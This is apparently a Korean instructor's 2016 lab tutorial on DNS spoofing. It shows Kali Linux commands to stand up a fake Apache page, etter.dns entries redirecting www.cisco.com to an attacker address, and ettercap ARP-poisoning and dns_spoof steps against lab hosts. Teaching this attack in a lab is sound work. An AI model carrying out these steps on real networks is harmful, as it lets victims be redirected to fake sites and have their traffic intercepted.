정보보안(구버전)/공격툴&정보수집 2016. 5. 25. 15:20

공격툴&정보수집 - 11. DNS Spoofing 공격

 

 

본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.

 

 

 - DNS Spoofing : 실제 DNS 서버가 아닌, 공격자 DNS 서버를 통해서 서비스를 받게하는 공격 유형

 

 

@ Kali Linux

 

 - Kali Linux는 데미안 계열 리눅스이므로 CentOS와 HTTP 설정 파일 이름이 다르다.

 

root@kali:~# ls /etc/apache2/
apache2.conf    conf-enabled  magic           mods-enabled  sites-available
conf-available  envvars       mods-available  ports.conf    sites-enabled

 

 

 - Fake 웹-페이지를 생성한다.

 

root@kali:~# cd /var/www/html
root@kali:/var/www/html# ls
index.html


root@kali:/var/www/html#
root@kali:/var/www/html# echo "Fake Web Site" > /var/www/html/index.html
root@kali:/var/www/html#
root@kali:/var/www/html# service apache2 restart
root@kali:/var/www/html# pgrep -lf apache
1963 apache2
1967 apache2
1968 apache2
1969 apache2
1970 apache2
1971 apache2
1972 apache2

 


root@kali:/var/www/html# service apache2 status
● apache2.service - LSB: Apache2 web server
   Loaded: loaded (/etc/init.d/apache2)
   Active: active (running) since 수 2016-05-25 16:00:00 KST; 18s ago
  Process: 1942 ExecStart=/etc/init.d/apache2 start (code=exited, status=0/SUCCESS)
   CGroup: /system.slice/apache2.service
           ├─1963 /usr/sbin/apache2 -k start
           ├─1967 /usr/sbin/apache2 -k start
           ├─1968 /usr/sbin/apache2 -k start
           ├─1969 /usr/sbin/apache2 -k start
           ├─1970 /usr/sbin/apache2 -k start
           ├─1971 /usr/sbin/apache2 -k start
           └─1972 /usr/sbin/apache2 -k start

 5월 25 16:00:00 kali apache2[1942]: Starting web server: apache2.

 

 

root@kali:/var/www/html# firefox http://192.168.20.50

 

 

 

 

 

 - ettercap DNS 설정 파일 설정

 

root@kali:/var/www/html# cd /etc/ettercap
root@kali:/etc/ettercap# ls
etter.conf  etter.dns  etter.mdns  etter.nbns

 

 

root@kali:/etc/ettercap# vi etter.dns

 

 ~ 중간 생략 ~

 

###############################################
# one day we will have our ettercap.org domain
#

www.ettercap.org           A  127.0.0.1
www.ettercap-project.org   A  127.0.0.1
ettercap.sourceforge.net   A  23.235.43.133
www.ettercap.org           PTR ::1

 

###############################################
# DNS Spoofing Test
#
www.cisco.com              A  192.168.20.50
*.cisco.com                A  192.168.20.50
www.cisco.com              PTR 192.168.20.50

 

###############################################
# some MX examples
#

alor.org   MX  127.0.0.1
naga.org   MX  127.0.0.1
example.org MX 127.0.0.2
microsoft.com MX 2001:db8::1ce:c01d:bee3

~ 중간 생략 ~

 

: wq!

 

 

root@kali:/etc/ettercap# cd

 

 

 - ettercap 툴 실행

 

root@kali:~# ettercap -G &

 

 

Sniff -> Unified sniffing -> eth1 선택 -> 확인

 

 

 

Hosts -> Scan for hosts

 

 

 

Hosts -> Host list

 

 

 

192.168.20.100 -> Add to Target1   &   192.168.20.201 -> Add to Target2

 

 

 

Mitm -> ARP Poisoning -> 'Sniff remote connections' 체크 -> 확인

 

 

 

Plugins -> Manage the plugins -> dns_spoof 더블 클릭

 

 

 

Start -> start sniffing

 

 

 

@ Window2008

 

 - DNS 캐싱 정보 초기화 실시

 

C:\Users\Administrator>ipconfig /flushdns

 

Windows IP 구성

 

DNS 확인자 캐시를 플러시했습니다.

 

C:\Users\Administrator>

 

 

 - 'www.cisco.com' 접속 확인

 

 

 

 

@ Kali Linux

 

 - ettercap 스니핑 결과 확인

 

 

 

 

 - ettercap 스니핑 중지 (Start -> Stop sniffing) 및 종료 실시

 

 

@ Window2008

 

 - DNS 캐싱 정보 초기화 실시

 

C:\Users\Administrator>ipconfig /flushdns

 

Windows IP 구성

 

DNS 확인자 캐시를 플러시했습니다.

 

C:\Users\Administrator>



[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)


공격툴&정보수집 - 제11장 DNS Spoofing 공격   https://youtu.be/nQPElqYM71E

Posted by 김정우 강사(카카오톡 : kim10322)
,


Q